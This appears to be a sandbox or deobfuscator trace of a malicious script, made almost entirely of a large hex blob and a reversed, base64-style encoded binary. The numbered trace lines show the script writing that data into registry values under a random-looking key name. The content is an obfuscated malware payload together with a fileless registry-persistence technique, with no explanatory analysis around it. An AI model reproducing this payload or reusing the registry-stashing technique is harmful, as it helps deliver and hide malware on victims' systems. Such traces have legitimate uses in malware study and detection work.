700B0662786F1522A0700B0E42776F1522A0700B0C32766F1522A0700B0C22756F1522A0700B0A12746F1522A0700B0012736F1522A0700A0EF2726F1522A0700A02F2716F1522A0700A04E2706F1522A0700608027F5F1522A0700A08D27E5F1522A0700A06C27D5F1522A0700A08B27C5F1522A0700A08A27B5F1522A0700A0C927A5F1522A0700A0092795F1522A0700A0082785F1522A0700A0E62775F1522A0700A0062765F1522A0700A0252755F1522A0700A0242745F1522A0700A0632735F1522A0700A0622725F1522A0700A0412715F1522A0700A0202705F1522A0700900F27F4F1522A0700900E27E4F1522A0700900D27D4F1522A0700902C27C4F1522A0700906B27B4F1522A0700906A27A4F1522A070090C82794F1522A070090282784F1522A070090272774F1522A070090662764F1522A070090452754F1522A070090242744F1522A070090632734F1522A070090422724F1522A070090212714F1522A070090202704F1522A0700804F27F3F1522A0700804E27E3F1522A0700806D27D3F1522A0700806C27C3F1522A070080EB27B3F1522A0700800B27A3F1522A070080E92793F1522A070080092783F1522A070080482773F1522A070080272763F1522A070080062753F1522A070080E42743F1522A070080242733F1522A070080032723F1522A070080022713F1522A070080412703F1522A0700802027F2F1522A0700700F27E2F1522A0700700E27D2F1522A070070EC27C2F1522A0700700C27B2F1522A070070EA27A2F1522A0700700A2792F1522A070070E82782F1522A070070C72772F1522A070070A62762F1522A070070C52752F1522A070070A42742F1522A070070A32732F1522A070070822722F1522A070070412712F1522A070070602702F1522A0700606F27F1F1522A070060CE27E1F1522A070060AD27D1F1522A070060EC27C1F1522A0700602C27B1F1522A070060AB27A1F1522A0700600B2791F1522A0700600A2781F1522A070060092771F1522A070060482761F1522A070060272751F1522A070060062741F1522A070060252731F1522A070060042721F1522A070060032711F1522A070060812701F1522A0700608027F0F1522A0700506F27E0F1522A070050AE27D0F1522A070050CD27C0F1522A0700502C27B0F1522A0700508B27A0F1522A070050CA2790F1522A070050E927E1522A070050E827D1522A070050A727C1522A070050C627B1522A070050E527A1522A070050052791522A070050042781522A070050632771522A0700504227615210000004D80000002C02001100002100008000004003310000008BC000CC7B0010001000000110000000A200A00000358260C270A7A00000858208A00033026CEDA000004382100000544711EFF510EF6170F530EF616030EF41100000545702EDFFFFFF4B0000000000000020546010B2713003EFF160B080A3EDFFFFFFCCFFFFFFFBFFFFFFCBFFFFFF9BFFFFFF9AFFFFFFEBFFFFFF18FFFFFFF6FFFFFF6600000000000000A054B06185717097ED4B1390401140316D714011C0E10000B20030B200A0000075F6A94011400000F0E7C0B10031B220C2A00000658261070050412750115031A000005582A0000045F6A94011400000F0E7C0910074B2403161D0AD7196E8400000F0E7C081A0EFF100A000003582000011000011000000DE003003B10000008BC000CC7B0010001000000110000000A200A00000358260C270A7A00000858208A00033026CEDA000004382100000544711EFF510EF6170F530EF616030EF41100000545702EDFFFFFF4B0000000000000020546010B2713003EFF160B080A3EDFFFFFFCCFFFFFFFBFFFFFFCBFFFFFF9BFFFFFF9AFFFFFFEBFFFFFF18FFFFFFF6FFFFFF6600000000000000A054B06185717097ED4B1390401140316D714011C0E10000B20030B200A0000075F6A94011400000F0E7C0B10031B220C2A00000658261070050602750115031A000005582A0000045F6A94011400000F0E7C0910074B2403161D0AD7196E8400000F0E7C081A0EFF100A000003582000011000011000000DE003003B100A26000B2A07100110000700000007000100331A2A0000025F6607070C270B040000061E7400000610820A0000015F6607070C270B040000061E7A0A0000005376000004760EF41110000010000004300200331A2A0000025F6607070C270B040000051E7400000510820A0000015F6607070C270B040000051E7A0A000000537600000C660EF41110000010000004300200331A2A0000025F6607070C270B040000031E7400000310820A0000015F6607070C270B040000031E7A0A0000005376000005560EF41110000010000004300200331A2A0000025F6607070C270B040000021E7400000210820A0000015F6607070C270B040000021E7A0A0000005376000004560EF41110000010000004300200331A2A0000025F6607070C270B040000011E7400000110820A0000015F6607070C270B040000011E7A0A0000005376000006560EF41110000010000004300200331A2A0000025F6607070C270B040000001E7400000010820A0000015F6607070C270B040000001E7A0A000000537600000A560EF4111000001000000430020033100A24000005308070040CE274000003308070040EC274000001308A000009482A00000F4820021A0A00000E4F6A00000D4370700408B27400000F208600000448240000032E7070040E927400000E208600000448240000032E7070040E927400000D208600000448240000032E7070040E927400000C208600000448240000032E7070040E927400000B208600000448240000032E7070040E927400000A208600000448240000032E707004048274000009208600000448240000032E707004024274000008208600000448240000032E707004001274000007208600000448240000032E7070030ED274000006208600000448240000032E707003048274000005208A00000C482A00000B482A00000A4820700204927A00000A482070030C727A00000A482070030E527A00000A4820700204927A00000A4826000001582A00000A4820700306427A00000A4820700204927A00000A4826000000582A00000A4820700300327A00000A4820700204927A00000A482600000E482A00000A482070030A127A00000A4820700204927A00000A4826000002582A00000A482070030C027A00000A4820700204927A00000A482600000C482A00000A4820700200F27A00000A4820700204927A00000A482600000D482A00000A4820700204D27A00000A4820700204927A00000A482600000F482A00000A4820700208B27A00000A4820700204927A00000A482600000B482A00000A482070020A927A00000A4820700204927A00000A482600000A4820700208727A00000B482A00000A48260000064820700204527A000009482A00000848207002083274000004208070020C2274000003208070010B82740000022080700101727400000120807001055274000000208A000007437400000E1080700105327400000D1080700103327400000C108070010D027400000B1080700005F27400000A1080700003E274000009108070000FC27006000000382A00000643700600000E282A00000643700600000C282A00000643700600000A282A000006437006000008282A000006437006000006282A000006437006000004282A000006437006000002282A000006437400000F008A000005482400000E0080700005C27400000D008070000FA2711000080000030B30030033100A26000B2A0600000E18200110000F0000000B00010033100A26000B2A0400000A0E700110000F0000000B00010033100A26000B2A040000090E700110000E0000000B000100331A26000B2A040000080E70000400000800880C0A000002437A0000014F6A00000D282200000800D070000172712C270B0A0000004824140000080E700110000D0000000C3002003310000A26000B2A0A00000F3E7A00000F308B200002082A0C270B010EF41B1000080C8A00000F3E700110000C00000006200200331000000A26000B2A0200050B2A0B20000108280C270B010EF41B1000060C82000110000B0000000D100200331A26000B2A0A00000D282200000600D00110000900000000100100331A26000B2A0A00000E3822000110000A0000000C000100331A26000B2A0A00000D282200000500D00110000900000000100100331A26000B2A0A00000D382200011000080000000C0001003310000A26000B2A0A00000C382A00000B3823020001100007000000021002003310000000071001E16000800200000009813000B90000800100000C11000A26000B2A02000CD00A0000083F6A00000D282B10000600D40000060E700A7A000007337A0000053F6401160116031A00000F2822AA0000063F6A0000053F64011615210000004D871070000B3276211EF30EF615011503130EF41A0000053F640114031A0000043825291B2616240D252100000D35747EDA0B2000010820000A0000023F641A00000D282B10000600D40000060E7004000006008A00000133700C0B20000A7A000000337A00000F28210000004D861070000102761C290D0A00000E2F6A00000D282B10000600D40000060E723C280C030EF4140000060E70000008D9370B07110B2A00000C2F6B100006061EF00F0F0C2B1000060C8200011000060000000FF005003B1A26000B2A0A00000B2F640000050E700110000500000000100100331A26000B2A0A00000A2F640000040E700110000400000000100100331A26000B2A0A0000092F640000030E700110000300000000100100331A26000B2A0A0000082F640000020E700110000200000000100100331A26000B2A0A0000072F640000010E700110000100000000100100331000000A24000003AD7302022A200B24000003AB72062A24000002AD7302022A200B24000002AB72062A24000001AD7302022A200B24000001AB72062A2400000D908A000108837E2A2400000B9D7302022A200B2400000B9B72062A2400000A9D7302022A200B2400000A9B72062A240000099D7302022A200B240000099B72062A240000089D7302022A200B240000089B72062A240000079D7302022A200B240000079B72062A240000069D7302022A200B240000069B72062A240000059D7302022A200B240000059B72062A240000049D7302022A200B240000049B72062A240000039D7302022A200B240000039B72062A240000029D7302022A200B240000029B72062A240000019D7302022A200B240000019B72062A240000009D7302022A200B240000009B72062A2400000F8D7302022A200B2400000F8B72062A2400000E8D7302022A200B2400000E8B72062A2400000D8D7302022A200B2400000D8B72062A2400000C8D7302022A200B2400000C8B72062A2400000B8D7302022A200B2400000B8B72062A2400000A8D7302022A200B2400000A8B72062A240000098D7302022A200B240000098B72062A2400000B6D730200062A2400000E6D730200062A2400000D6D730200062A2400000C6D730200062A240000026D7612040000016D7A0001070E72040000006D730202000005151EF2000A8A2400000F4D74020400000E4D730202000002151EF2000E5A2400000E308600000CA37E2A2A00000A38220E1A200A0001011822062600000B98240000093B7200065A240000073D7402040000063D7302000A0001030822000E5A262A000007EF62040000002E700A3A2006000000682A000000A8260000089F6300700C168270026A260A2400000710820E1A200B240000071E722A200B240000061E722A200B240000051E722A2400000410820E1A200B240000041E722A200B240000031E722A200B240000021E722A200B240000011E722A200B240000001E722A2A00000448220E1A2400000A0082000009047A000003482600000D13765A24000009008200022A2B100006051EF300062A200A00000A382200062A2B100006051EF3000A0000093F6B100006061EF3000A5A24000005008A0000062374000004008A0000052374000003008A0000042374000002008A0000032374000001008A000002237ECA200A000001282200062A2A00000028220E1000000E7000000E6000000F600000074000000160000002700000046000000E7000000E700000042000000D600000052000000730000000400000064000000E7000000000000000080806040302010000000000000FFFA37968E3BE8F0CFD738000000000000000000000000000000000000000000000000000000000000000000000000000000000000008B0010028C600000190000003000001FC800101208005000200000008400000000002031040000000000000000000000000000000024000004000000000000000000000000002080000000200000200400000000C0000036F6C65627E20400000400000000000000000000000000106F000000210000200200000001F800000036273727E2060000020000000000000000000000000000200000104F000000020000103F4600000047875647E20000000000000000000000840000028000000000000000000000008000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000C00020040000000000000000000000000000000000000001F800200200000000F4002031C0000000000000000000000001000000000000010000010000000001000001000058040020000000000000200000200600000000000000004000000000000000400000200000000200000400000020020000000200002031E5000000000000410000104F00000510B01020000E00000000000000006679D29D003010C4000054050000000000000042A0D0D0E25646F6D60235F44402E69602E657270256260247F6E6E6163602D6162776F62707023796864512DCC4108B12DC904B00E0ABF1E000000008000000000000000000000000000000000000000000000000000000000000000000000004000000000000008B0000FFFF00000040000000300009A5D4";
                                                                                                                                                    88
                                                                                                                                                    writeToRegistry ( directoryName, "r", regValue1 );
                                                                                                                                                    • writeToRegistry("YLhjFraZZwiadZg","r","00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000234D000000C000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300E2000300E2000300E20013000000E600F6009600370027005600650002009700C6002600D600560037003700140010008000830000000300E2000300E2000300E20013000000E600F600960037002700560065004700360057004600F600270005001000800043000000130007000700140037007700F6004600E60096007500000000005600D6001600E4004700360057004600F600270005001000C00083000000C600C6004600E200130007000700140037007700F6004600E6009600750000005600D6001600E6005600C60096006400C6001600E6009600760096002700F40010000100840000000000000000003700B60027001600D60056004600160027004500C600160076005600C40010001000A20000004300230003002300020002009A0002004700860076009600270097000700F600340000004700860076009600270097000700F6003400C600160076005600C4001000210084000000C600C6004600E200130007000700140037007700F6004600E6009600750000005600D6001600E400C6001600E600270056004700E600940010000100040000000300E2000300E2000300E200130000000000E600F600960037002700560065005600C600960064001000800003000000130007000700140037007700F6004600E6009600750000000000E600F6009600470007009600270036003700560044005600C600960064001000C000040000000000000000005600D6001600E4009700E60016000700D600F600340010001000220000000000000037004700E6005600D600D600F600340010001000A1000000030026004300030003000300030003001000002086000000F6006600E60094005600C600960064007600E600960027004700350010000020C8400B00000000000000E600F600960047001600C6003700E60016002700450000004000420000000000F6006600E60094005600C600960064002700160065001000000044000000000000000000000000000000200000004000000000000000F30000000000100000000000000010000000100000EFFE40DB0000000000F4006400E4009400F500E400F40094003500250054006500F5003500650000004330C20000000000000000000030C20000088500000084000000000010000000000000000000000000000008000003000000100010000000000000000000000000000008000081000000010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100020052FF0000000000C6C646E2565627F63637D600E69616D4C6C64427F634F5000000000000000000000000264B0000000000000000000000000000000000000000000002000000262C00000000000000000000268A00264607E2130707143777F646E69675C57657265644C5A626F6C5130707143777F646E69675C54323032363038323C53747E656D65736F644C5E696D64616C53727563755C5A33400000010634D72C087DAE5B8245EDFAA65F09256354435250000000000000000000000000000000100000000000000000000000000004402") ➔ undefined
                                                                                                                                                    89
                                                                                                                                                    writeToRegistry ( directoryName, "s", hexToAscii ( tempString ) );
                                                                                                                                                    • hexToAscii("3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414D3841414141774141414145414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141345465734A57626C4E3363683943504B306750765A6D624A523363314A486476774449676F51442B6B4864704A58646A56326376774449674143494B3067507A56325A6C785761326C6D635152575A304E585A3146585A7939435067414349674143494B3067507649535A7A7857596D4A53507A4E585A6A4E5751705648496949585A72396D64756C3063684A535073566D646C78474973566D646C786B62766C4764314E575A3456455A6C5233636C5658636C4A48506741434967414349674169434E346A497A596E4C744E5859363032626A3143646D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E6273314765674D585A6E564762705A58617942465A6C5233636C5658636C4A485067414349674143494B30675035525861795633596C4E485067414349676F51442B49694D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A35476274684849765A6D624A523363314A4864384143494B3067507649436377466D4C753957613046325970784763774655654E4A53506C315759754269497734434D75416A4C78495350753957617A4A585A32425365306C47647556475A4A6C48626931575A7A4E5859384143494B30675069416A4C78495350753957617A4A585A575233636C5A5761754657626749534D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A3547627468484935786D59745632637A4647504B3067434E347A50694D585A354A53506C3532627346475A754647647A4269493430695255566C4939636D62705232626A35575A6749434D75456A4939343262704E6E636C5A4849733147652F777A76372B4F41414141414141414141414141426F4F41414D4775414141417741674C414144417541414D41344341784141414134474176425161414D48417942515A41594641674151654177474169425162415547417A4277634145454142414143416744414141414D413443417741674C414144417541514D4141414175427762416B47417A4267634155474157424164414D47413142415A4138474179424155414541414941414E414141416E42675A415147416E42675A415147416E42675A415147414141414141554741744251594134454130427759415548416B4277624149484151425141416F414130414141414141416C424165415547417541414E414944417741674D415944417741414F414944414141515A413047416842676241554741734251614159454173425159413447417042775A416B474179427754414541414E4167514141414141414141414141417A4277614149484168425162415547416B4251594149484155424162414547416E42515A4177454142415141416F43414141414E414944417741674D414143416741517141414341304241614163474170426763416B484177427762414D454141414164416747416E42516141494841354241634138474144424162414547416E42515A41774541424167454167454141414141415547413442515A413443413041674D414144417941674E414144413441674D414141416C425162414547414F42416241454741754267634155474130426762416B454142415144416F44414141414D413443417741674C414144417541514D41414141") ➔ "=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"
                                                                                                                                                    • writeToRegistry("YLhjFraZZwiadZg","s","=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